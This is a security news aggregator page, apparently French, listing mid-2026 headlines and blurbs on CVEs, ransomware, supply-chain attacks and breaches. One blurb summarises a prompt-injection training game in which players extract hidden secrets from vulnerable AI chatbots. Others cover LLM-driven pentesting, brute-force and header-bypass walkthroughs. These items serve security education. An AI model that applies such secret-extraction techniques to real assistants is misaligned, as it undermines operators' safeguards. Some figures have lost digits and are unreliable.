https://securityaffairs.com/193616/malware/supply-chain-attack-hits-popular-wordpress-plugins-through-awesome-motive-cdn.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Palo Alto's GlobalProtect Authentication Bypass Was Exploited Four Days After Disclosure
CVE-2026-0257's GlobalProtect authentication bypass went from advisory to active exploitation in four days. The recurring pattern of perimeter device failures demands more than a patch cycle.
Palo Alto’s GlobalProtect Authentication Bypass Was Exploited Four Days After Disclosure on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2026/06/15/globalprotect-authentication-bypass-cve-2026-0257-exploited/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
A week in security (June 8 – June 14)
A list of topics we covered in the week of June 8 to June 14 of 2026
https://www.malwarebytes.com/blog/news/2026/06/a-week-in-security-june-8-june-14
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Infostealers, AI, and a 90% Affiliate Cut Fuel The Gentlemen group's Rise
The Gentlemen ransomware used infostealer credentials, AI tools, and affiliates to hit 483 victims across 66 countries in under a year. The Gentlemen surfaced as a ransomware operation in September 2025 and by June 13, 2026 had listed 483 victims on their dark-web leak site, 380 of them in 2026 alone. That makes them the […]
https://securityaffairs.com/193622/uncategorized/infostealers-ai-and-a-90-affiliate-cut-fuel-the-gentlemen-groups-rise.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
How Ransomware Works: Encryption Is the Least of Your Problems
Ransomware still encrypts files with a hybrid AES/RSA scheme, but the data theft and backup destruction that happen before encryption are where modern attacks do their real damage.
How Ransomware Works: Encryption Is the Least of Your Problems on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2026/06/15/how-ransomware-works-encryption-explained/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Sniper Dz Scams Target MENA Users via Fake Facebook Offers and Browser Alerts
Cybersecurity researchers have disclosed details of fraudulent activity targeting users across the Middle East and North Africa by employing various fraudulent Facebook accounts impersonating politicians, public figures, and trusted organizations.
"These accounts promoted fake offers, including free mobile internet packages, financial compensation, and government subsidy programs," Group-IB
https://thehackernews.com/2026/06/sniper-dz-scams-target-mena-users-via.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Palo Alto Warns of Active Exploitation of PAN-OS GlobalProtect VPN Flaw
Palo Alto Networks has revealed that it has observed "active exploitation" of a recently disclosed PAN-OS vulnerability by an unknown threat actor to obtain unauthorized access to GlobalProtect portals.
The vulnerability in question is CVE-2026-0257 (CVSS score: 7.8), an authentication bypass flaw affecting the portal and gateway components of PAN-OS software that could be exploited by bad
https://thehackernews.com/2026/06/palo-alto-warns-of-active-exploitation.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Berkadia - 305,216 breached accounts
In March 2026, the commercial real estate finance company Berkadia was the target of a ShinyHunters "pay or leak" extortion campaign. The group subsequently published data they alleged was taken from Berkadia's Salesforce instance, including over 300k unique email addresses as well as names, physical addresses and phone numbers, among other data.
https://haveibeenpwned.com/Breach/Berkadia
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Infinite Campus - 137,123 breached accounts
In March 2026, the student information system Infinite Campus was targeted in a ShinyHunters "pay or leak" extortion campaign. The group subsequently published data they alleged was taken from Infinite Campus, containing 137k unique email addresses along with names, phone numbers, physical addresses and support tickets. Infinite Campus subsequently sent notifications, advising that the exposed data largely consisted of "names and contact information for school staff" and that "the majority is directory information commonly found on school websites".
https://haveibeenpwned.com/Breach/InfiniteCampus
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
L'Actu de la presse
JLR ordered 30,000 staff to reset passwords in person after cyberattack - DataBreaches.Net
Union urges government intervention with 100,000 jobs at risk after JLR cyber attack · Jaguar Land Rover issues update on job safety after cyber ...
https://databreaches.net/2026/06/15/jlr-ordered-30000-staff-to-reset-passwords-in-person-after-cyberattack/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Inside the FBI's Fake Town Designed to Train Agents - Newsweek
FBICyber AttackCyber CrimeCyberattacksCyber attacksCybersecurityFBI Investigation. More. News Article. Inside the FBI's Fake Town Designed to Train ...
https://www.newsweek.com/inside-fbi-fake-town-designed-train-agents-12074307
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Which Risks Are Shaping Director And Officer Agendas In 2026? - Forbes
... cyber attack. The survey also reflects an increasingly complex external environment, with geopolitical risk entering the global top seven for the ...
https://www.forbes.com/sites/johnbremen/2026/06/15/which-risks-are-shaping-director-and-officer-agendas-in-2026/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
NBI: PH cyber attack suspects identified | ANC - YouTube
... #TopStory. NBI: PH cyber attack suspects identified | ANC. 678 views · 6 hours ago. #ANCNews #ANCHighlights #TopStory ...more. ANC 24/7. 3.11M.
https://www.youtube.com/watch%3Fv%3D49ub7sOn0aI
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Irish hospital fined €300,000 over cyber attack on patient data - MLex
Irish hospital fined €300,000 over cyber attack on patient data. (June 15, 2026, 1:43 PM GMT) -- MLex Summary: Midlands Regional Hospital Tullamore ...
https://www.mlex.com/mlex/articles/2489594/irish-hospital-fined-300-000-over-cyber-attack-on-patient-data
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Attackers Hijack Popular WordPress Plugins to Deploy Backdoors - Infosecurity Magazine
Adriatic Port Cyber-Attack by Anubis Sparks Warning Over Maritime Security Risks · News 15 June 2026. What's Hot on Infosecurity Magazine? Read
https://www.infosecurity-magazine.com/news/wordpress-plugin-supply-chain/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Adriatic Port Cyber-Attack Sparks Warning Over Maritime Security - Infosecurity Magazine
New analysis, published on June 11 by threat intelligence firm Resecurity, examined a cyber-attack which saw Anubis list the Adriatic Port Authority ...
https://www.infosecurity-magazine.com/news/anubis-ransomware-adriatic-port/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
FBI created a 'ghost town'. Here's what they are using it for - ThePrint
cyber attack · FBI · US government. Categories: Features. Tags: cyber attack, FBI, US government. ThePrint. Back to top. Ad. Exit mobile version.
https://theprint.in/feature/fbi-fake-ghost-town/2960444/%3Famp
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Supreme Court to decide if migrants detained for months must receive bond hearings | News
More From ABC12 · Cancer patient says McLaren cyber attack has delayed his treatments · Democratic governor says Biden 'fit for office' after meeting.
https://www.abc12.com/news/supreme-court-to-decide-if-migrants-detained-for-months-must-receive-bond-hearings/article_15d11348-ee78-57f5-a1c5-f4a26326ca4c.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
EUROSATORY, LEONARDO PRESENTS THE CYBER DEFENCE SUITE
While digitalisation and high interoperability enhance operational effectiveness, they also inevitably expand the cyber attack surface, even in ...
https://www.leonardo.com/en/press-release-detail/-/detail/15-06-2026-eurosatory-leonardo-presents-the-cyber-defence-suite
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Automation, cyber and 'green' products redraw manufacturing risk map for insurers
... cyber attack surface and increasing the risk that an incident shuts down physical production, not just office systems. That makes cyber insurance ...
https://www.insurancebusinessmag.com/ca/news/commercial-liability/automation-cyber-and-green-products-redraw-manufacturing-risk-map-for-insurers-578759.aspx
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
15th June – Threat Intelligence Report - Check Point Research
Global Cyber Attack Reports; Security Report; Threat Research. 2024's Cyber Battleground Unveiled: Escalating Ransomware Epidemic, the Evolution of ...
https://research.checkpoint.com/2026/15th-june-threat-intelligence-report/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Soutenez No Hack Me sur Tipeee
L'Actu de la veille (Presse spécialisée)
Hackers Hide New Argamal Malware Inside Working Hentai Games
Kaspersky found Argamal malware hidden in hentai game installers, giving hackers remote access through working games shared on adult sites and torrents.
https://hackread.com/hackers-hide-argamal-malware-hentai-games/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
FBI disrupts massive AI-powered phishing service using a million URLs
In a coordinated effort, the FBI, working with Google and Black Lotus Labs, has dismantled a massive Chinese phishing-as-a-service operation called Outsider Enterprise with thousands of phishing websites used to steal credit card data and passwords. [...]
https://www.bleepingcomputer.com/news/security/fbi-disrupts-massive-ai-powered-phishing-service-using-a-million-urls/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 101
Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape Malware Newsletter IronWorm: Shai-Hulud’s rustier cousin Trojanized ai-sdk-ollama Delivers Miasma, a Self-Replicating npm Worm via binding.gyp Inside the Cross-Platform Propagation of a New Gafgyt Variant C0XMO Using AI Agents to Analyze Malware on REMnux The Miasma […]
https://securityaffairs.com/193609/breaking-news/security-affairs-malware-newsletter-round-101.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Apple Silicon Is Not a Safe Harbor From Spectre-Class Attacks
MIT's Fractal OS has found the first evidence of Apple M1 Phantom speculation and overturned prior research on the M1's conditional branch predictor, challenging the assumption that Apple Silicon is safer from speculative execution attacks.
Apple Silicon Is Not a Safe Harbor From Spectre-Class Attacks on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2026/06/14/apple-m1-phantom-speculation-fractal-os/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Security Affairs newsletter Round 581 by Pierluigi Paganini – INTERNATIONAL EDITION
A new round of the weekly Security Affairs newsletter has arrived! Every week, the best security articles from Security Affairs are free in your email box. Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press. Washington Pulled the Plug on Anthropic ‘s Fable 5 and Mythos 5 models. The Rest of […]
https://securityaffairs.com/193600/security/security-affairs-newsletter-round-581-by-pierluigi-paganini-international-edition.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Ukrainian Extradited from Ireland Pleads Guilty Over Role in Conti Ransomware Scheme
Ukrainian national Oleksii Lytvynenko pleaded guilty in the U.S. for his role in Conti ransomware attacks targeting victims worldwide. Oleksii Oleksiyovych Lytvynenko (44), a Ukrainian national extradited from Ireland to the U.S., has pleaded guilty to conspiracy to commit wire fraud for his involvement in the Conti ransomware operation. Prosecutors said he helped conduct attacks […]
https://securityaffairs.com/193590/uncategorized/ukrainian-extradited-from-ireland-pleads-guilty-over-role-in-conti-ransomware-scheme.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
L'Actu à J-2 (Presse spécialisée)
Automated Penetration Testing with Claude AI
Overview This article demonstrates a complete, end-to-end penetration test driven almost entirely through natural language. By connecting Claude Desktop to a Model Context Protocol (MCP)
The post Automated Penetration Testing with Claude AI appeared first on Hacking Articles.
https://www.hackingarticles.in/automating-penetration-testing-with-claude-ai/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Ex-school district employee jailed for hacks on former employer
A former IT employee at an Iowa school district was sentenced to 21 months in prison after conducting a prolonged cyberattack against the former employer that disrupted classroom operations, deleted accounts, and caused tens of thousands of dollars in damages. [...]
https://www.bleepingcomputer.com/news/security/ex-school-district-employee-jailed-for-hacks-on-former-employer/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Washington Pulled the Plug on Anthropic ‘s Fable 5 and Mythos 5 models. The Rest of the World Is Watching.
Anthropic disputes restrictions on Mythos 5 and Fable 5, arguing the decision lacks transparency and isn’t based on clear technical evidence. On Friday June 12 at 5:21pm ET, Anthropic received a letter from the US Commerce Department, signed by Commerce Secretary Howard Lutnick and drafted with officials from the Bureau of Industry and Security. The […]
https://securityaffairs.com/193579/ai/washington-pulled-the-plug-on-anthropic-fable-5-and-mythos-5-models.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Extradited Ukrainian Man Admits Role in Conti Ransomware Attacks
Ukrainian national Oleksii Lytvynenko has pleaded guilty in the US to wire fraud conspiracy linked to Conti ransomware, which hit more than 1,000 victims and generated at least 0 million in ransom payments.
https://hackread.com/extradited-ukrainian-admits-conti-ransomware-attacks/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Chinese hackers hijack auth flow, spy on isolated network for a decade
Chinese hackers took control of a target organization's authentication stack and maintained persistence for 10 years, with full visibility into the administrative activity. [...]
https://www.bleepingcomputer.com/news/security/chinese-hackers-hijack-auth-flow-spy-on-isolated-network-for-a-decade/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Critical Splunk Enterprise Flaw Lets Attackers Run Code Without Authentication
Splunk has released security updates to address a critical security flaw in Splunk Enterprise that could be exploited to conduct unauthenticated file operations and even remote code execution.
The vulnerability, tracked as CVE-2026-20253, is rated 9.8 on the CVSS scoring system.
"In Splunk Enterprise versions below 10.2.4 and 10.0.7, an unauthenticated user could create or truncate arbitrary
https://thehackernews.com/2026/06/critical-splunk-enterprise-flaw-lets.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
U.S. CISA adds Oracle PeopleSoft Enterprise PeopleTools flaw to its Known Exploited Vulnerabilities catalog
U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Oracle PeopleSoft Enterprise PeopleTools flaw to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Oracle PeopleSoft Enterprise PeopleTools flaw, tracked as CVE-2026-35273 (CVSS score of 9.8), to its Known Exploited Vulnerabilities (KEV) catalog. Oracle PeopleSoft Enterprise PeopleTools is the underlying technology platform […]
https://securityaffairs.com/193574/security/u-s-cisa-adds-oracle-peoplesoft-enterprise-peopletools-flaw-to-its-known-exploited-vulnerabilities-catalog.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Atomic Arch: 400+ AUR Packages Backdoored with eBPF Rootkit and Credential Stealer
An AUR supply chain attack compromised more than 400 Arch Linux packages from 11 June 2026, planting a Rust credential stealer and an eBPF rootkit that hides from standard inspection tools.
Atomic Arch: 400+ AUR Packages Backdoored with eBPF Rootkit and Credential Stealer on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2026/06/13/aur-supply-chain-attack-arch-packages-backdoored/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
U.S. Orders Anthropic to Suspend Fable 5 and Mythos 5 Access for Foreign Nationals
Anthropic said on Friday it will "abruptly disable" its most advanced artificial intelligence (AI) models, Claude Fable 5 and Mythos 5, for all users after the U.S. government ordered it to suspend access to the models for foreign nationals, whether inside or outside the U.S., citing national security concerns.
The AI company said it received an order at 5:21 p.m. ET, instructing it to suspend
https://thehackernews.com/2026/06/us-orders-anthropic-to-suspend-fable-5.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Weekly Metasploit Update: New Kerberos/Certificate tracing options, and multiple new modules
New Tracing OptionsAs hard as we try to ensure that Metasploit is bug free, issues inevitably come up. Whether you're running a module on an op or writing a new one, what we can do is make the debugging experience easier. To that end one of our two Google Summer of Code (GSoC) projects is here to deliver. Building on the previous pattern of HttpTrace comes two new options KerberosTicketTrace and CertificateTrace. These options, when enabled, will enable debugging output of Kerberos tickets and Certificates that are both sent and received by applicable modules. Now when things aren't going quite right, users have new levers to reach for to inspect what's happening under the hood.For example, to inspect exactly what's happening when using the auxiliary/admin/kerberos/get_ticket module:msf...
https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-13-06-2026
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
L'Actu des jours précédents
Tracing Digital Intent: New MacOS Tahoe 26 Artifact Discovered
Unit 42 has discovered a new macOS Tahoe 26 forensic artifact that tracks user menu selections across the operating system. Learn more here.
The post Tracing Digital Intent: New MacOS Tahoe 26 Artifact Discovered appeared first on Unit 42.
https://unit42.paloaltonetworks.com/new-macos-artifact-discovered/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Iran-Linked Handala Breached a California Water Utility. It Could Have Done Worse, and It Knows That.
Pro-Iran group Handala breached Cal Water via an exposed GPS tool, reaching billing data for 2M customers. 5GB leaked. On June 11, 2026, the Iran-linked threat group Handala posted a claim on its blog that it had compromised California Water Service, known as Cal Water, and published a 5GB proof-of-concept data dump to back it […]
https://securityaffairs.com/193565/uncategorized/iran-linked-handala-breached-a-california-water-utility-it-could-have-done-worse-and-it-knows-that.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
ShinyHunters Uses Oracle Zero-Day to Rampage Higher Ed
A major bug in Oracle's ERP software disproportionately affected American universities, and hackers have capitalized by stealing gobs of data.
https://www.darkreading.com/vulnerabilities-threats/shinyhunters-oracle-zero-day-higher-ed
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Over 400 Arch Linux AUR Packages Hijacked to Deploy Infostealer and eBPF Rootkit
Attackers took over more than 400 packages in the Arch User Repository (AUR) this week and rewrote their build scripts to install a credential stealer on any machine that built them.
The malware is a Rust binary built to harvest developer secrets. When it lands with root, it can also load an eBPF rootkit to hide itself. The AUR is Arch Linux's community package collection, and it is separate
https://thehackernews.com/2026/06/over-400-arch-linux-aur-packages.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Google Sues Chinese Smishing Network Accused of Using Gemini AI in Phishing
Google on Friday said it's pursuing legal action against a Chinese cybercrime network, accusing it of using its Gemini artificial intelligence (AI) agent to send phishing text messages targeting Americans.
The network is said to be behind the development and management of a phishing-as-a-service (PhaaS) software kit called Outsider, per the tech giant.
"The operation weaponized Gemini to help
https://thehackernews.com/2026/06/google-sues-chinese-smishing-network.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Atomic Arch Campaign Hijacks 20+ Linux AUR Packages to Deliver Malware
Over 20 Linux packages were compromised in the Atomic Arch campaign, which abuses AUR ownership transfers to drop rootkit-like malware.
https://hackread.com/atomic-arch-hijacks-linux-aur-packages-malware/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
ShinyHunters Target Universities in Oracle PeopleSoft Zero-Day Attack
Google says ShinyHunters exploited Oracle PeopleSoft zero-day to steal data from 100+ organisations, with universities making up most victims.
https://hackread.com/shinyhunters-universities-oracle-peoplesoft-zero-day-attack/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Stolen iPhones could soon be worth a lot less to thieves
Apple and the Met Police are working together to make stolen iPhones harder to reset, resell, and profit from.
https://www.malwarebytes.com/blog/mobile/2026/06/stolen-iphones-could-soon-be-worth-a-lot-less-to-thieves
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Active Exploitation of Oracle PeopleSoft Zero-Day (CVE-2026-35273)
OverviewOn June 10, 2026, Oracle published a security alert for CVE-2026-35273, a critical vulnerability in the Updates Environment Management component of PeopleSoft Enterprise PeopleTools. Oracle released an out-of-band patch the same day as the advisory, underscoring the urgency of remediation. The vulnerability has a CVSSv3.1 score of 9.8 and is remotely exploitable without authentication. Per the vendor advisory, successful exploitation may result in remote code execution (RCE). TrendAI has classified the underlying flaw as a server-side request forgery (CWE-918). PeopleTools versions 8.61 and 8.62 are affected.CVE-2026-35273 was reported to Oracle through TrendAI's Zero Day Initiative. According to a report published by Mandiant on June 11, 2026, this vulnerability has been exploited...
https://www.rapid7.com/blog/post/etr-active-exploitation-of-oracle-peoplesoft-zero-day-cve-2026-35273
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
The SpaceX Pre-IPO Market: How Crypto Rails Are Opening Synthetic Access
SpaceX Pre-IPO demand is growing as crypto exchanges offer synthetic exposure to its reported .75T valuation without direct equity ownership.
https://hackread.com/spacex-pre-ipo-market-crypto-synthetic-access/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Claude Fable 5 Doesn't Change the Mythos Security Story
Stay cool: Mythos 5 is an upgrade over Mythos Preview while Fable 5 is Mythos "made safe for general use," Anthropic explains.
https://www.darkreading.com/vulnerabilities-threats/claude-fable-5-doesnt-change-mythos-security-story
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Code Girls: The Secret Heroes Of World War II
This week in cybersecurity from the editors at Cybercrime Magazine Sausalito, Calif. – Jun. 12, 2026 – Watch the YouTube Short During World War II, some of America's most powerful weapons weren't bombs or guns. They were women sitting in secret rooms breaking enemy codes,
The post Code Girls: The Secret Heroes Of World War II appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/code-girls-the-secret-heroes-of-world-war-ii/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Penelope – A Modern Alternative to Netcat for Red Teamers
Overview This article presents an end-to-end engagement built entirely around Penelope, an automated shell handler and post-exploitation framework. We catch an initial reverse shell on
The post Penelope – A Modern Alternative to Netcat for Red Teamers appeared first on Hacking Articles.
https://www.hackingarticles.in/penelope-a-modern-alternative-to-netcat-for-red-teamers/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Feds Seize AudiA6 and Dark2Web in 9M Crypto Laundering Case
Feds seized AudiA6 and Dark2Web in a major crypto laundering case, arresting two suspects linked to over 9M in alleged illicit transactions.
https://hackread.com/feds-seize-audia6-dark2web-crypto-laundering-case/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Fake verification pages are stealing Steam accounts from players
A convincing fake FACEIT verification page is stealing Steam accounts by using a fake login window that looks completely legitimate.
https://www.malwarebytes.com/blog/threat-intel/2026/06/fake-verification-pages-are-stealing-steam-accounts-from-players
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
IEEE Victoris 4.0 — CTF 2025 — Quals DFIR Challenges
IEEE Victoris 4.0 — CTF 2025 —Quals DFIR ChallengesHi, I'm glad to share with you my writeup for getting first blood in 2/2 DFIR challenges.First Challenge: “the Frontdoor” FIRST BLOOD🩸in this challenge, we have a linux disk image, we need to investigate it to get the correct answer. reading the bash history or “.zsh_history” we can view that there's a lot of file navigations commands, and Git activity in “MyProject” which located in /home/Documents.also, while i was digging around all linux files, i found an xml file “recently-used.xml” located in “/home/kali/.local/share/recently-used.xml”. this xml tracks that he opened /home/kali/Documents/MyProject/.git/config file using Mousepad and Thunar “kali linux gui”.so, configfile will be first file to...
https://infosecwriteups.com/ieee-mansb-ctf-2025-dfir-writeup-3b49a1afe7f6?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
DVWA Cheat Sheet (Low & Medium)
Damn Vulnerable Web ApplicationBrute Force: Low & MediumJust testing with this username & password to get the error message (we will need it)As you can see, we got this error message, So let's hop on Burp Suite and intercept the GET RequestThis is the GET RequestSend it to the Intruder, hit Clear to clear any saved parameter, select the password that you sent for mine it was ‘admin' so select it and hit AddThe word after (password=) must be colored like thisNow let's go to the payloads section in the intruder and load our txt payload file (i used the top 100 words from rockyou.txt wordlist for simplicity)Now we set the payload, How can we find if tha password is right ot not ?So,let's go to settings in the intruder section to make our customizationadd incorrect word to these wordsIntruder...
https://infosecwriteups.com/dvwa-cheat-sheet-low-medium-c7490e76f1b5?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
How I Built a SOAR Automation in Microsoft Sentinel That Responds to Attacks Without a Single Click
A Logic App playbook, an automation rule, a real permissions error — and what it taught me about how automated incident response actually works.An SSH brute force incident fires in Sentinel. High severity. 260 failed attempts in 28 minutes. Without automation, an analyst gets paged, manually opens the incident, investigates, and responds. That process takes 15 to 30 minutes on a good day — longer if it's 3am.With SOAR, the moment that incident is created, a playbook runs automatically. No analyst needed. No manual trigger. The response is documented, timestamped, and logged before anyone even opens their laptop.This is how I built that automation in Microsoft Sentinel from scratch — and what I ran into along the way.What SOAR actually isSOAR stands for Security Orchestration,...
https://infosecwriteups.com/how-i-built-a-soar-automation-in-microsoft-sentinel-that-responds-to-attacks-without-a-single-click-e41226314564?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Six levels, one lesson: LLMs cannot keep a secret
A hands-on breakdown of GitHub's Secure Code Game Season 3 and why your system prompt is not a security layer.I like keeping this “Let's all learn AI Security” part fun. So I found this little game on prompt injection that I think you'll like and it actually teaches you quite a few things.GitHub's Secure Code Game Season 3 is an open source, browser-based challenge consisting of six levels, each one a vulnerable AI assistant with a hidden secret and a dare to extract it. You craft the attack, you feel it work, and then you fix it. No CTF experience needed.The scenario running through all six levels: a fast-growing e-commerce company needs an AI chatbot for their gift card department. Deadline in three days. You and a junior colleague are building it. Each level is a new iteration...
https://infosecwriteups.com/six-levels-one-lesson-llms-cannot-keep-a-secret-742927383722?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Recovering a Forgotten Password in a Self-Hosted n8n Docker Deployment
Learn how to recover complete access to a self-hosted n8n Docker deployment when password reset emails fail.Continue reading on InfoSec Write-ups »
https://infosecwriteups.com/recovering-a-forgotten-password-in-a-self-hosted-n8n-docker-deployment-251e073757f5?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Header Manipulation: Bypasses, Probing, and the Security Audit Nobody Does
Request headers are not metadata. They are inputs, and inputs can be manipulated.Series: curl — The Request Engine You Never Learned Properly Article: 7 of 16Request headers are not just metadata. They are inputs. And like any input that reaches server-side logic, they can be manipulated — to bypass access controls, probe for misconfigurations, spoof identity, and test security posture.This article covers the header manipulation techniques that show up constantly on THM/HTB machines and in real web application testing: Host header attacks, IP spoofing headers, 403 bypass patterns, CORS misconfiguration testing, and the security header audit that most beginners skip entirely.Most techniques here are one flag or one -H addition away from a curl command you already know how to write.The...
https://infosecwriteups.com/header-manipulation-bypasses-probing-and-the-security-audit-nobody-does-62e85ad28cb0?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Beyond the Patch: Understanding the SonicWall SSL-VPN MFA Bypass Exposure
In May 2026, ransomware-linked attacks associated with CVE-2024–12802 targeting SonicWall Gen6 SSL-VPN devices regained attention. The vulnerability stems from a structural flaw in how SSL-VPN authentication handles UPN (User Principal Name) and SAM (Security Account Manager) account formats separately. In certain environments, attackers can exploit alternative login formats to bypass MFA even when MFA appears to be enabled.What makes this vulnerability particularly dangerous is that it is not simply a patching issue. SonicWall's official advisory states that Gen6 devices require an additional six-step manual LDAP reconfiguration after firmware updates. However, standard patch management workflows typically verify only firmware versions and do not confirm whether the manual reconfiguration...
https://infosecwriteups.com/beyond-the-patch-understanding-the-sonicwall-ssl-vpn-mfa-bypass-exposure-35b0627ceac2?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Check Point VPN Authentication Bypass (CVE-2026-50751): Client-Controlled IKEv1 Auth Flipped by Ransomware Affiliate
A CVSS 9.3 flaw in Check Point Remote Access VPN let unauthenticated attackers bypass certificate validation by supplying a crafted IKEv1 VendorID payload — exploited for 32 days before a patch, with one confirmed Qilin ransomware post-compromise chain.
Check Point VPN Authentication Bypass (CVE-2026-50751): Client-Controlled IKEv1 Auth Flipped by Ransomware Affiliate on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2026/06/12/check-point-vpn-authentication-bypass-cve-2026-50751-client-controlled-ikev1-auth-flipped-by-ransomware-affiliate/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Phishing Attack Volume Down 20%, But Risk Still Rising
Hackers are valuing quality over quantity, using AI to upgrade their phishing attacks rather than multiply them.
https://www.darkreading.com/cybersecurity-analytics/phishing-volume-down-20-risk-rising
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Drupal Core CVE-2026-9082 Active Exploitation Confirmed Within Days of Disclosure
Sensor Intel Series: June 2026 CVE Trends
https://www.f5.com/labs/articles/drupal-core-cve-2026-9082-active-exploitation-confirmed-within-days-of-disclosure
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
USN-8426-1: Linux kernel (Azure) vulnerabilities
It was discovered that the Linux kernel algif_aead module did not properly
handle in-place cryptographic operations. This flaw is known as Copy Fail.
A local attacker could use this to escalate privileges, or possibly escape
a container. (CVE-2026-31431)
It was discovered that the Linux kernel did not properly handle shared page
fragments during socket buffer operations, collectively known as Dirty
Frag. A logic flaw existed in the XFRM ESP-in-TCP subsystem and in the
RxRPC networking subsystem when processing paged fragments. A local
attacker could use this to escalate privileges, or possibly escape a
container. (CVE-2026-43284, CVE-2026-43500)
It was discovered that a logic flaw existed in the XFRM ESP-in-TCP
subsystem in the Linux kernel when handling socket buffer fragments. This
flaw...
https://ubuntu.com/security/notices/USN-8426-1
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
ShinyHunters Leak 40GB of University of Nottingham Student Data
ShinyHunters hackers leak 40GB of University of Nottingham personal and financial data, allegedly impacting 450,000 students and staff records.
https://hackread.com/shinyhunters-university-of-nottingham-student-data-leak/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
USN-8423-1: lwIP vulnerabilities
It was discovered that lwIP contained a buffer overflow in the EAP
authentication handling code. An attacker could possibly use this issue
to trigger a buffer overflow, resulting in arbitrary code execution or a
denial of service. This issue only affected Ubuntu 20.04 LTS.
(CVE-2020-8597)
It was discovered that lwIP incorrectly handled certain ICMPv6 or
6LoWPAN packets. An attacker could possibly use this issue to trigger a
buffer overflow, resulting in information disclosure. This issue only
affected Ubuntu 20.04 LTS. (CVE-2020-22283, CVE-2020-22284)
It was discovered that lwIP did not properly validate certain SNMPv3
authentication parameters. An attacker could possibly use this issue to
trigger a stack-based buffer overflow, resulting in arbitrary code
execution or a denial of service....
https://ubuntu.com/security/notices/USN-8423-1
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Atomic Arch npm Campaign Adds Malicious Dependency
TL;DR
On June 11, 2026, Sonatype researchers uncovered Atomic Arch, a new campaign targeting orphaned packages in the Arch User Repository in which attackers take over legitimate, abandoned AUR projects and modify PKGBUILDS to install a malicious npm package during installation.
Analysis of atomic-lockfile, the malicious dependency, found a bundled Linux payload with functionality tied to credential harvesting, stealth, anti-debugging, and potential data exfiltration.
